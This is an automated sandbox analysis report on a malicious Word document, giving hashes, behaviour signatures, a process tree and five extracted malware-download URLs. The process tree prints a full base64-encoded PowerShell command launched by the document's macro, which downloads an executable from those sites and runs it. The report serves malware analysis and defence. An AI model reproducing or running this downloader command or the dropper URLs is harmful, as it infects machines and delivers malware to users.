Overview

overview

10

Static

static

8

56d6488a1b...53.doc

windows7_x64

10

56d6488a1b...53.doc

windows10-2004_x64

10

Analysis

  • max time kernel
    107s
  • max time network
    59s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    01-07-2022 04:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    56d6488a1b865cef4425d95aced79a4ad03364810e505fb1964d20be3a40de53.doc

  • Size

    168KB

  • MD5

    f25839380349099bcc91c17e337410c9

  • SHA1

    e0d97e0496f43485f8ab9538e79d90d3845fa309

  • SHA256

    56d6488a1b865cef4425d95aced79a4ad03364810e505fb1964d20be3a40de53

  • SHA512

    0eaea2f974781b1501b20dec6f37c5c445acb4b3035b26cf0795aa45bbbd9ab0175a6dc051b74564d4db46fdb746f05e64ad7a575fdaa87bda59567e3933edec

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://artmikhalchyk.com/wp-includes/mYW3/
exe.dropper

http://franosbarbershop.com/wp-content/plugins/IUh1/
exe.dropper

http://arexcargo.com/wp-includes/QBci/
exe.dropper

http://altarfx.com/wordpress/wQYt/
exe.dropper

http://uitcs.acm.org/wp-content/fqSlt/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\56d6488a1b865cef4425d95aced79a4ad03364810e505fb1964d20be3a40de53.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1464
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1224
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABrAEEAeAB3AFUAdwBBAGsAPQAoACcAaQAnACsAJwBrACcAKwAnAG8AUQBBAEEAbwBaACcAKQA7ACQAbABBAEEAUQBDAG8ARAA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQATwBBAEQAdwBBADEARAA9ACgAJwBoACcAKwAnAHQAdABwADoALwAvAGEAcgB0AG0AaQBrACcAKwAnAGgAYQBsAGMAaAB5AGsALgBjAG8AbQAvAHcAcAAtAGkAbgAnACsAJwBjACcAKwAnAGwAdQBkAGUAcwAnACsAJwAvACcAKwAnAG0AWQBXADMALwBAAGgAJwArACcAdAB0AHAAJwArACcAOgAnACsAJwAvACcAKwAnAC8AZgByAGEAbgBvAHMAYgBhACcAKwAnAHIAYgBlAHIAcwBoACcAKwAnAG8AcAAuAGMAbwBtAC8AdwAnACsAJwBwAC0AYwBvAG4AdAAnACsAJwBlAG4AdAAvACcAKwAnAHAAbAB1AGcAaQBuAHMALwBJAFUAaAAxAC8AJwArACcAQABoAHQAJwArACcAdABwADoALwAvAGEAcgBlACcAKwAnAHgAYwBhAHIAZwBvAC4AJwArACcAYwBvAG0ALwAnACsAJwB3AHAALQBpAG4AYwBsAHUAZABlAHMAJwArACcALwAnACsAJwBRACcAKwAnAEIAYwBpACcAKwAnAC8AQAAnACsAJwBoAHQAdAAnACsAJwBwADoALwAvAGEAJwArACcAbAB0AGEAJwArACcAcgBmAHgAJwArACcALgBjACcAKwAnAG8AbQAvACcAKwAnAHcAJwArACcAbwByAGQAcAByAGUAcwBzAC8AJwArACcAdwAnACsAJwBRAFkAdAAvAEAAaAB0AHQAJwArACcAcAA6AC8AJwArACcALwB1AGkAJwArACcAdABjAHMALgBhAGMAbQAnACsAJwAuACcAKwAnAG8AcgBnAC8AJwArACcAdwAnACsAJwBwAC0AYwBvAG4AdABlAG4AJwArACcAdAAvACcAKwAnAGYAcQBTAGwAdAAnACsAJwAvACcAKQAuACgAJwBTACcAKwAnAHAAbABpAHQAJwApAC4ASQBuAHYAbwBrAGUAKAAnAEAAJwApADsAJABNAEEAbwBRAEIAQgA9ACgAJwBQACcAKwAnADQAQQBrAFgAJwArACcAWABVAFgAJwApADsAJABtAG8ARwAxAFUAQQBBACAAPQAgACgAJwA4ACcAKwAnADUAOQAnACkAOwAkAGEARABBAEEAUQBCAEQAQgA9ACgAJwBNAEEAMQBEAEQAJwArACcANABvACcAKQA7ACQAaQBBAFEAQQBRAFoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAG0AbwBHADEAVQBBAEEAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABQAEEAQQA0AEEAawBaACAAaQBuACAAJABPAEEARAB3AEEAMQBEACkAewB0AHIAeQB7ACQAbABBAEEAUQBDAG8ARAAuACgAJwBEACcAKwAnAG8AdwBuACcAKwAnAGwAbwBhAGQARgBpAGwAZQAnACkALgBJAG4AdgBvAGsAZQAoACQAUABBAEEANABBAGsAWgAsACAAJABpAEEAUQBBAFEAWgApADsAJABoAEEAQQBBAEEAQgA9ACgAJwB3ACcAKwAnAFUAawAnACsAJwBEAFgARABBACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABpAEEAUQBBAFEAWgApAC4AIgBMAGAARQBuAGAAZwBUAGgAIgAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AC4AKAAnAEkAbgB2AG8AawAnACsAJwBlAC0AJwArACcASQB0AGUAbQAnACkAIAAkAGkAQQBRAEEAUQBaADsAJABRAFoAawBBAHcAQQBCAFUAPQAoACcAegAnACsAJwBBAEIANABRAEEANABrACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABYAGsAQQAxAEQAQQBBAD0AKAAnAEMAJwArACcAQQBBAEEARABBACcAKQA7AA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1364

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1224-58-0x0000000000000000-mapping.dmp
      Download
    • memory/1224-59-0x000007FEFBEF1000-0x000007FEFBEF3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1364-66-0x0000000002344000-0x0000000002347000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1364-70-0x000000000234B000-0x000000000236A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1364-71-0x0000000002344000-0x0000000002347000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1364-72-0x000000000234B000-0x000000000236A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1364-69-0x0000000002344000-0x0000000002347000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1364-67-0x000000000234B000-0x000000000236A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1364-65-0x000007FEF3610000-0x000007FEF416D000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/1364-64-0x000007FEF4280000-0x000007FEF4CA3000-memory.dmp
      Filesize

      10.1MB

      Download
    • memory/1464-54-0x0000000072841000-0x0000000072844000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1464-62-0x0000000005543000-0x0000000005546000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1464-61-0x0000000005543000-0x0000000005546000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1464-68-0x00000000712AD000-0x00000000712B8000-memory.dmp
      Filesize

      44KB

      Download
    • memory/1464-60-0x00000000712AD000-0x00000000712B8000-memory.dmp
      Filesize

      44KB

      Download
    • memory/1464-57-0x00000000754A1000-0x00000000754A3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1464-55-0x00000000702C1000-0x00000000702C3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1464-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1464-73-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1464-74-0x00000000712AD000-0x00000000712B8000-memory.dmp
      Filesize

      44KB

      Download